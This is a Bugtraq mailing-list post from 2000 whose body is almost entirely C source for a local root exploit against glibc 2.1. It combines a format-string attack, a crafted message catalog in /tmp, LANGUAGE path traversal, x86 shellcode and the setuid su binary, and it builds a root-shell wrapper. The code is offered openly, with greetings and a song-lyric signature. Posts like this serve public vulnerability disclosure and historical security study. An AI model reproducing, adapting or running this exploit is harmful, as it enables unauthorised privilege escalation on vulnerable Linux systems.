[16653] in bugtraq
glibc language
daemon@ATHENA.MIT.EDU (Maurycy Prodeus)
Thu Sep 7 20:53:23 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.3.96.1000907235942.5333A-100000@sv>
Date: Fri, 8 Sep 2000 00:00:45 +0200
Reply-To: Maurycy Prodeus <z33d@ETH-SECURITY.NET>
From: Maurycy Prodeus <z33d@ETH-SECURITY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
/*
* "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)"
* - greg@tenet.pl -
*
* GLIBC 2.1 language exploit by z33d@eth-security.net (C) 2000
* with bypassing Solar Designer Stack Patch
*
* Dedicated to greg@tenet.pl
*
* It doesn't work. ;> Try use gdb to find special value.
* Tested on Debian 2.1/2.2 ziemniak
* Greetz:
* - abusers from if.pwr.wroc.pl :))) (IF-NET)
* - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :)
* - lcamtuf - argante rulz :)
* - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc...
* :))))))))))))))))))))))
* - secure@poz.sm.pl no i wogole #sigsegv
* funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ...
* - breslau killers z vx na czele :>
* - ppl from my so called real life
* - kefir truskawkowy
* most code I ripped :>
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#define DEFAULT_ALIGNMENT 2
// #define DEFAULT_RETLOC 0xbfffd2ff
// #define DEFAULT_RETLOC 0xbffff798
#define DEFAULT_RETLOC 0xbffff770
#define DEFAULT_BUFFER_SIZE 2048
#define PATH "/tmp/LC_MESSAGES"
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"dupaa"
"\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80"
"\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
// very special shellcode, 15 min ;> big thanks to yeti
char sh[]=
"#include <stdlib.h>\n"
"#include <stdio.h>\n"
"#include <unistd.h>\n"
"int main(){\n"
"setuid(0);\n"
"setgid(0);\n"
"system(\"/bin/bash\");\n"
"}\n";
int main(int argc, char *argv[]) {
char *buff, *buff1, *ptr;
char *env[3];
long shell_addr,retloc=DEFAULT_RETLOC;
int align=DEFAULT_ALIGNMENT;
int bsize=DEFAULT_BUFFER_SIZE;
int i,reth,retl,num=132; // maybe 121
struct stat j;
FILE *fp;
if (argc > 1) sscanf(argv[1],"%x",&retloc);
if (argc > 2) num = atoi(argv[2]);
printf("Stay sharp ...\n");
printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]);
if (!(buff = malloc(1024))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(buff1 = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
printf("Using RET location address: 0x%x\n", retloc);
shell_addr=0x00124270; // or 0x00124250
printf("Using Shellcode address: 0x%x\n", shell_addr);
reth = (shell_addr >> 16) & 0xffff ;
retl = (shell_addr >> 0) & 0xffff ;
ptr = buff;
for (i = 0; i <2 ; i++, retloc+=2 ){
memset(ptr,'A',4);
ptr += 4 ;
(*ptr++) = retloc & 0xff;
(*ptr++) = (retloc >> 8 ) & 0xff ;
(*ptr++) = (retloc >> 16 ) & 0xff ;
(*ptr++) = (retloc >> 24 ) & 0xff ;
}
memset(ptr,'A',align);
ptr = buff1;
for(i = 0 ; i < num ; i++ )
{
memcpy(ptr, "%.8x", 4);
ptr += 4;
}
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
(0x10000 + reth - retl));
mkdir(PATH,0755);
chdir(PATH);
fp = fopen("libc.po", "w+");
if (!fp){
printf("Skript kidies ?\n");
exit(0);
}
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode);
fclose(fp);
system("/usr/bin/msgfmt libc.po -o libc.mo");
i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR);
fstat(i,&j);
lseek(i,j.st_size-2,SEEK_SET);
write(i,"\0\0\0\0\0\0",6);
close(i);
fp = fopen("/tmp/sh.c","w+");
if (!fp){
printf("Skript kidies ?\n");
exit(0);
}
fprintf(fp,"%s",sh);
fclose(fp);
system("cd /tmp;gcc sh.c -o sh");
env[0] = "LANGUAGE=sk_SK/../../../../../../tmp";
env[1] = (char *)0 ;
execle("/bin/su","su","-u", buff, NULL,env);
perror("execle");
return 0;
}
- z33d -
--
Freestate
Let yourself go
Let yourself go
Let your senses overflow
Step out of your cage
And onto the stage
It's time to start
Playing your part
Freedom awaits
Open the gates
Open your mind
Freedom's a state
/ Depeche Mode
